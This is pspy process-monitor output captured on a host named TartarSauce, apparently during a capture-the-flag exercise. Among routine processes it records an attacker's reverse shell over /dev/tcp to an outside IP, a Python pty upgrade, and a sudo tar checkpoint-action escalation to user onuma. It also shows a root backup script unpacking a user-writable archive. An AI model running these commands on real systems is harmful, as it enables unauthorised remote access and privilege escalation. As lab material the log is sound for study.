onuma@TartarSauce:/dev/shm$ ./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░
                   ░           ░ ░
                               ░ ░

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2021/03/30 12:24:20 CMD: UID=0    PID=992    | /usr/lib/policykit-1/polkitd --no-debug
2021/03/30 12:24:20 CMD: UID=0    PID=95     |
2021/03/30 12:24:20 CMD: UID=0    PID=928    | /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
2021/03/30 12:24:20 CMD: UID=0    PID=9      |
2021/03/30 12:24:20 CMD: UID=0    PID=879    | /usr/lib/snapd/snapd
2021/03/30 12:24:20 CMD: UID=0    PID=878    | /usr/lib/accountsservice/accounts-daemon
2021/03/30 12:24:20 CMD: UID=0    PID=877    | /usr/sbin/acpid
2021/03/30 12:24:20 CMD: UID=0    PID=876    | /lib/systemd/systemd-logind
2021/03/30 12:24:20 CMD: UID=0    PID=875    | /usr/bin/lxcfs /var/lib/lxcfs/
2021/03/30 12:24:20 CMD: UID=0    PID=865    | /usr/sbin/atd -f
2021/03/30 12:24:20 CMD: UID=0    PID=85     |
2021/03/30 12:24:20 CMD: UID=108  PID=847    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
2021/03/30 12:24:20 CMD: UID=0    PID=846    | /usr/sbin/cron -f
2021/03/30 12:24:20 CMD: UID=0    PID=842    | /usr/bin/vmtoolsd
2021/03/30 12:24:20 CMD: UID=104  PID=841    | /usr/sbin/rsyslogd -n
2021/03/30 12:24:20 CMD: UID=0    PID=83     |
2021/03/30 12:24:20 CMD: UID=0    PID=82     |
2021/03/30 12:24:20 CMD: UID=0    PID=81     |
2021/03/30 12:24:20 CMD: UID=0    PID=80     |
2021/03/30 12:24:20 CMD: UID=0    PID=8      |
2021/03/30 12:24:20 CMD: UID=0    PID=79     |
2021/03/30 12:24:20 CMD: UID=0    PID=78     |
2021/03/30 12:24:20 CMD: UID=0    PID=77     |
2021/03/30 12:24:20 CMD: UID=100  PID=713    | /lib/systemd/systemd-timesyncd
2021/03/30 12:24:20 CMD: UID=0    PID=7      |
2021/03/30 12:24:20 CMD: UID=0    PID=668    |
2021/03/30 12:24:20 CMD: UID=0    PID=6      |
2021/03/30 12:24:20 CMD: UID=0    PID=5      |
2021/03/30 12:24:20 CMD: UID=0    PID=450    |
2021/03/30 12:24:20 CMD: UID=0    PID=431    | /lib/systemd/systemd-udevd
2021/03/30 12:24:20 CMD: UID=0    PID=416    | /sbin/lvmetad -f
2021/03/30 12:24:20 CMD: UID=0    PID=415    |
2021/03/30 12:24:20 CMD: UID=0    PID=414    |
2021/03/30 12:24:20 CMD: UID=0    PID=413    |
2021/03/30 12:24:20 CMD: UID=0    PID=411    |
2021/03/30 12:24:20 CMD: UID=0    PID=408    | /lib/systemd/systemd-journald
2021/03/30 12:24:20 CMD: UID=0    PID=4      |
2021/03/30 12:24:20 CMD: UID=0    PID=356    |
2021/03/30 12:24:20 CMD: UID=0    PID=355    |
2021/03/30 12:24:20 CMD: UID=0    PID=35     |
2021/03/30 12:24:20 CMD: UID=1000 PID=3424   | ./pspy32
2021/03/30 12:24:20 CMD: UID=0    PID=34     |
2021/03/30 12:24:20 CMD: UID=33   PID=3393   | /usr/sbin/apache2 -k start
2021/03/30 12:24:20 CMD: UID=0    PID=3378   |
2021/03/30 12:24:20 CMD: UID=0    PID=3370   |
2021/03/30 12:24:20 CMD: UID=0    PID=315    |
2021/03/30 12:24:20 CMD: UID=0    PID=314    |
2021/03/30 12:24:20 CMD: UID=0    PID=3064   |
2021/03/30 12:24:20 CMD: UID=0    PID=3056   |
2021/03/30 12:24:20 CMD: UID=0    PID=305    |
2021/03/30 12:24:20 CMD: UID=0    PID=304    |
2021/03/30 12:24:20 CMD: UID=0    PID=30     |
2021/03/30 12:24:20 CMD: UID=0    PID=29     |
2021/03/30 12:24:20 CMD: UID=0    PID=280    |
2021/03/30 12:24:20 CMD: UID=0    PID=28     |
2021/03/30 12:24:20 CMD: UID=0    PID=27     |
2021/03/30 12:24:20 CMD: UID=0    PID=26     |
2021/03/30 12:24:20 CMD: UID=0    PID=25     |
2021/03/30 12:24:20 CMD: UID=0    PID=24     |
2021/03/30 12:24:20 CMD: UID=0    PID=23     |
2021/03/30 12:24:20 CMD: UID=0    PID=22     |
2021/03/30 12:24:20 CMD: UID=0    PID=212    |
2021/03/30 12:24:20 CMD: UID=0    PID=211    |
2021/03/30 12:24:20 CMD: UID=0    PID=21     |
2021/03/30 12:24:20 CMD: UID=0    PID=201    |
2021/03/30 12:24:20 CMD: UID=0    PID=20     |
2021/03/30 12:24:20 CMD: UID=0    PID=2      |
2021/03/30 12:24:20 CMD: UID=0    PID=19     |
2021/03/30 12:24:20 CMD: UID=1000 PID=1845   | /bin/bash
2021/03/30 12:24:20 CMD: UID=1000 PID=1844   | tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
2021/03/30 12:24:20 CMD: UID=0    PID=1843   | sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
2021/03/30 12:24:20 CMD: UID=0    PID=180    |
2021/03/30 12:24:20 CMD: UID=0    PID=18     |
2021/03/30 12:24:20 CMD: UID=0    PID=179    |
2021/03/30 12:24:20 CMD: UID=0    PID=178    |
2021/03/30 12:24:20 CMD: UID=0    PID=17     |
2021/03/30 12:24:20 CMD: UID=0    PID=16     |
2021/03/30 12:24:20 CMD: UID=0    PID=1567   |
2021/03/30 12:24:20 CMD: UID=33   PID=1555   | /bin/bash
2021/03/30 12:24:20 CMD: UID=33   PID=1553   | python3 -c import pty; pty.spawn("/bin/bash")
2021/03/30 12:24:20 CMD: UID=0    PID=15     |
2021/03/30 12:24:20 CMD: UID=33   PID=1444   | bash -i
2021/03/30 12:24:20 CMD: UID=33   PID=1443   | bash -c bash -i >& /dev/tcp/10.10.14.78/443 0>&1
2021/03/30 12:24:20 CMD: UID=33   PID=1442   |
2021/03/30 12:24:20 CMD: UID=33   PID=1441   | /usr/sbin/apache2 -k start
2021/03/30 12:24:20 CMD: UID=0    PID=14     |
2021/03/30 12:24:20 CMD: UID=0    PID=13     |
2021/03/30 12:24:20 CMD: UID=33   PID=1223   | /usr/sbin/apache2 -k start
2021/03/30 12:24:20 CMD: UID=33   PID=1222   | /usr/sbin/apache2 -k start
2021/03/30 12:24:20 CMD: UID=33   PID=1221   | /usr/sbin/apache2 -k start
2021/03/30 12:24:20 CMD: UID=33   PID=1220   | /usr/sbin/apache2 -k start
2021/03/30 12:24:20 CMD: UID=33   PID=1219   | /usr/sbin/apache2 -k start
2021/03/30 12:24:20 CMD: UID=0    PID=1215   | /usr/sbin/apache2 -k start
2021/03/30 12:24:20 CMD: UID=0    PID=12     |
2021/03/30 12:24:20 CMD: UID=0    PID=1160   | /sbin/agetty --noclear tty1 linux
2021/03/30 12:24:20 CMD: UID=107  PID=1132   | /usr/sbin/mysqld
2021/03/30 12:24:20 CMD: UID=0    PID=1124   | /sbin/iscsid
2021/03/30 12:24:20 CMD: UID=0    PID=1123   | /sbin/iscsid
2021/03/30 12:24:20 CMD: UID=0    PID=112    |
2021/03/30 12:24:20 CMD: UID=0    PID=11     |
2021/03/30 12:24:20 CMD: UID=0    PID=10     |
2021/03/30 12:24:20 CMD: UID=0    PID=1      | /sbin/init
2021/03/30 12:24:54 CMD: UID=0    PID=3445   | /lib/systemd/systemd-udevd
2021/03/30 12:24:54 CMD: UID=0    PID=3444   | /lib/systemd/systemd-udevd
2021/03/30 12:24:54 CMD: UID=0    PID=3443   | /lib/systemd/systemd-udevd
2021/03/30 12:24:54 CMD: UID=0    PID=3442   | /lib/systemd/systemd-udevd
2021/03/30 12:24:54 CMD: UID=0    PID=3441   | cut -d  -f1
2021/03/30 12:24:54 CMD: UID=0    PID=3440   | sha1sum
2021/03/30 12:24:54 CMD: UID=0    PID=3439   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3438   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3437   | /lib/systemd/systemd-udevd
2021/03/30 12:24:54 CMD: UID=0    PID=3436   | /lib/systemd/systemd-udevd
2021/03/30 12:24:54 CMD: UID=0    PID=3435   | /lib/systemd/systemd-udevd
2021/03/30 12:24:54 CMD: UID=0    PID=3434   | /lib/systemd/systemd-udevd
2021/03/30 12:24:54 CMD: UID=0    PID=3433   | /lib/systemd/systemd-udevd
2021/03/30 12:24:54 CMD: UID=0    PID=3432   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3448   | seq 72
2021/03/30 12:24:54 CMD: UID=0    PID=3447   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3446   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3450   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3451   |
2021/03/30 12:24:54 CMD: UID=0    PID=3453   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3458   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3460   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3462   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3463   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3464   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3465   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3466   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3467   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3469   |
2021/03/30 12:24:54 CMD: UID=0    PID=3471   |
2021/03/30 12:24:54 CMD: UID=0    PID=3472   |
2021/03/30 12:24:54 CMD: UID=0    PID=3474   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3475   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3476   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3477   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3478   |
2021/03/30 12:24:54 CMD: UID=0    PID=3480   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3481   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3482   |
2021/03/30 12:24:54 CMD: UID=0    PID=3483   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3484   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3485   |
2021/03/30 12:24:54 CMD: UID=0    PID=3487   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3488   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3489   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3490   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3491   |
2021/03/30 12:24:54 CMD: UID=0    PID=3492   |
2021/03/30 12:24:54 CMD: UID=0    PID=3493   |
2021/03/30 12:24:54 CMD: UID=0    PID=3495   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3496   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3497   |
2021/03/30 12:24:54 CMD: UID=0    PID=3498   |
2021/03/30 12:24:54 CMD: UID=0    PID=3499   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3500   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3501   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3502   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3504   |
2021/03/30 12:24:54 CMD: UID=0    PID=3506   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3507   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3508   |
2021/03/30 12:24:54 CMD: UID=0    PID=3510   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3511   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3512   |
2021/03/30 12:24:54 CMD: UID=0    PID=3514   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3515   | /usr/bin/printf -
2021/03/30 12:24:54 CMD: UID=0    PID=3518   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=0    PID=3521   |
2021/03/30 12:24:54 CMD: UID=0    PID=3523   | /bin/rm -rf /var/tmp/. /var/tmp/.. /var/tmp/check
2021/03/30 12:24:54 CMD: UID=0    PID=3527   | /bin/sleep 30
2021/03/30 12:24:54 CMD: UID=0    PID=3526   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:24:54 CMD: UID=1000 PID=3530   | /bin/tar -zcvf /var/tmp/.291abafda3a9a189bd87fce39dc5a83112cc2438 /var/www/html
2021/03/30 12:24:54 CMD: UID=1000 PID=3531   | gzip
2021/03/30 12:25:24 CMD: UID=0    PID=3537   | /bin/tar -zxvf /var/tmp/.291abafda3a9a189bd87fce39dc5a83112cc2438 -C /var/tmp/check
2021/03/30 12:25:24 CMD: UID=0    PID=3536   | /bin/tar -zxvf /var/tmp/.291abafda3a9a189bd87fce39dc5a83112cc2438 -C /var/tmp/check
2021/03/30 12:25:25 CMD: UID=0    PID=3539   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:25:25 CMD: UID=0    PID=3538   | /bin/bash /usr/sbin/backuperer
2021/03/30 12:25:25 CMD: UID=0    PID=3540   | /bin/mv /var/tmp/.291abafda3a9a189bd87fce39dc5a83112cc2438 /var/backups/onuma-www-dev.bak
2021/03/30 12:25:25 CMD: UID=0    PID=3541   | /bin/rm -rf /var/tmp/check . ..
2021/03/30 12:25:25 CMD: UID=0    PID=3544   |
^CExiting program... (interrupt)